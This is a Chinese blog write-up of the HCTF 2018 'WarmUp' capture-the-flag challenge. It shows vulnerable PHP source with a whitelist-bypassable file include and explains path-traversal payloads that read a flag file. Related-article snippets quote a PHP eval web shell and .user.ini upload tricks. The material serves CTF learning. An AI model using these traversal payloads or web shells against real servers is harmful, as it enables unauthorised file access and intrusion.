[HCTF 2018]WarmUp

最新推荐文章于 2023-08-19 10:24:31 发布
最新推荐文章于 2023-08-19 10:24:31 发布
阅读量72 收藏
点赞数
分类专栏: BUUCTF 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44022113/article/details/114298929
版权

进到靶机一个硕大的滑稽,查看源码有提示source.php

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }  
?>

发现白名单有source.php和hint.php,先去查看一下hint.php

flag not here, and flag in ffffllllaaaagggg

分析源码

  • 判断$_REQUEST['file']对象为空且为字符串
  • 执行emmm类中的checkFile方法判断是否在白名单(确保函数返回是true)
  • 文件包含

checkFile函数中字符串截取判断是否在白名单(代码17-24和26-34)所以有两种绕过方法。

  1. 第一种
file=hint.php?../../../../../ffffllllaaaagggg

字符串截取将原字符串尾部加上?再截取第一个?之前的内容。所以需要在构造payload时问号前需要是白名单里的文件。问号之后,猜测flag位置在根目录下,所以使用尽可能多的../返回上级目录。

  1. 第二种
hint.php%3F..%2F..%2F..%2F..%2F..%2Fffffllllaaaagggg

将第一种payload使用urlencode编码即可。

深海神奇舰舰长
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
HCTF2018 WarmUp
BlueDoorZz的博客
07-11 421
BUU第一题,老实说第一次做的时候手足无措。 0x01 题目类型:php代码审计,文件包含。 0x02 点开链接,开门见山就是一个大大的滑稽。 查看源代码,注释中提醒有source.php文件。访问source.php,看到源码。 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) {
TensorFlow Serving API设置warmup
01-07
运行后附代码文件生成tf_serving_warmup_requests文件; 置其于模型保存文件夹内的assets.extra文件夹下; 重启docker API即可,可观察到屏幕输出显示warmp启动成功; 保存模型的文件结构于是乎成为: . ├── ...
HCTF 2018 Warm up
qq_53689523的博客
02-06 140
所以,可以知道flag在ffffllllaaaagggg中,接下来,我们分析source.php文件,我们看到其设置了白名单(source.php和hint.php),如果不在白名单内,直接返回False,根本就不会执行文件查询语句,所以只有构造url,绕过source.php,才可以访问到ffffllllaaaagggg文件。看到源代码里提示一个source.php文件,所以我们猜测,要么是加载过来一个php文件(可是F12以后,没有发现),要么就是当前目录下有个source.php
[ctf]HCTF 2018 warmup超详详详详解
momoadsp的博客
05-11 3759
打开以后发现是一个jpg图片,查看源代码 发现被注释掉的source.php 访问 发现了,因为high_file而被泄漏的源代码 发现除了source.php,还有hint.php 我们访问hint.php 我们知道了flag在ffffllllaaaagggg中 接着我们来分析代码 <?php highlight_file(__FILE__); class emmm { public static function checkFile
BUUCTF WEB HCTF 2018 WarmUp
Ethan552525的博客
07-11 849
1:题目 2:解题 2.1:查看源码 按F12发现提示:<!--source.php--> 2.2:尝试打开source.php http://f25ece33-0891-47a1-b89a-eefac33b2f4f.node4.buuoj.cn/source.php 得到代码: 2.3:解析代码 2.3.1:代码正文解析 if (! empty($_REQUEST['file']) &...
【BUUCTF】 HCTF2018 WarmUp
最新发布
m0_68259687的博客
08-19 205
前面的部分重新赋予$page,且这部分必须包含source.php或者hint.php,因此我们可以猜出这个请求应该是。大致意思是,只有链接中包含了file文件请求且通过了checkFile函数的验证,那么将把链接包含的file文件include到页面中,否则输出一张图片(推测为那个滑稽头像)可以看到 函数会检查file请求是否为空,是否是字符串等,且只有在参数中包含了source .php或者hint.php时才会生效。按照常规思路f12,看一看有什么,结果发现了一个名为source.php的注释。
HCTF 2018 WarmUp Wp
Luminous_song的博客
08-28 295
首先打开页面是一个滑稽的表情,直接F12看到source.php的提示 ok/source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
[HCTF 2018]WarmUp详解
qq_52364123的博客
04-10 242
BUUCTF-[HCTF 2018]WarmUp-代码审计
[HCTF 2018] WarmUp
Knsec
05-13 2257
[HCTF 2018] WarmUp 开局一张图,先看看页面源码信息 给出了一个 source.php 应该是后端的源码,这题代码审计了 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"
HCTF 2018-warmup
m0_73303597的博客
12-07 363
自用
SharePoint Warm up WSP包
05-10
SharePoint Warm up WSP包是一种专门针对SharePoint环境优化启动速度的解决方案。在SharePoint环境中,初次访问或者长时间未访问的网站集可能会因为缓存、IIS应用程序池回收等因素导致加载速度较慢。这种现象通常被...
WarmUp
03-26
在IT行业中,尤其是在Web开发领域,"WarmUp"通常指的是预热或准备阶段,这可能涉及到服务器、应用程序或特定功能的初始化。在这个场景下,"WarmUp"可能是指优化CSS(Cascading Style Sheets)性能的过程,确保网页...
Proyecto-Warmup
03-18
标题“Proyecto-Warmup”很可能是一个Java项目的名字,它可能是为了热身或者初始化某个复杂的开发任务而设计的。在Java编程中,"Warmup"通常指的是预热过程,这可能涉及到启动应用、加载必要的数据结构或进行性能...
TICs-WarmUp
03-29
项目通过GitHub克隆获取,仓库名为"TICs-WarmUp",提供了实践操作的代码示例。下面将详细解释这个教程的主要内容和相关知识点。 首先,克隆仓库是软件开发中的常见操作,用于获取远程存储库的本地副本。在本案例中...
BUUCTF寒假刷题-Web
热门推荐
Braindance
02-28 6万+
寒假横向刷题(尽量) BUUCTF 2021.01.15 [HCTF 2018]WarmUp 进到靶机一个硕大的滑稽,查看源码有提示source.php <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","h.
[SUCTF 2019]CheckIn
Braindance
03-06 410
知识点 .user.ini。它比.htaccess用的更广,不管是nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。可谓很广,不像.htaccess有局限性,只能是apache. 准备好.user.ini文件内容为自动包含图片马,因为上传会检查文件头,所以添加了一个GIF文件头伪装: GIF89a auto_prepend_file=233.gif 接下来上传图片马,尝试了正常上传的一句话会提示: <? in contents! 所以使用script马执.
[极客大挑战 2019]Upload
Braindance
03-04 379
先尝试上传一个gif图片马内容为 GIF89a <?php @eval($_POST['a']); 页面提示过滤: NO! HACKER! your file included ‘<?’ 尝试script执行php代码 <script language="php">eval($_POST['cmd'])</script> 可以上传,文件在/upload目录下。尝试修改后缀上传,phtml上传成功,可以执行php和script代码,使用蚁剑连接。 ...
[HCTF 2018]admin
Braindance
03-06 297
可以在注释里找到 <!-- you are not admin --> 思路应该是只要我们是admin登陆就可以得到flag,可以找到注册按钮,不能注册admin,那就随便注册一个进去看看。找到几个功能。 post。发表文章,但是没能找到在哪里打开 change password。改密码,尝试下能不能抓包改到admin的密码 修改密码抓到的包: 感觉并没有什么下手的地方,唯一的就是session可能和身份有关。 以下的是看网上的wp 在change password页面查看源码,发现.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值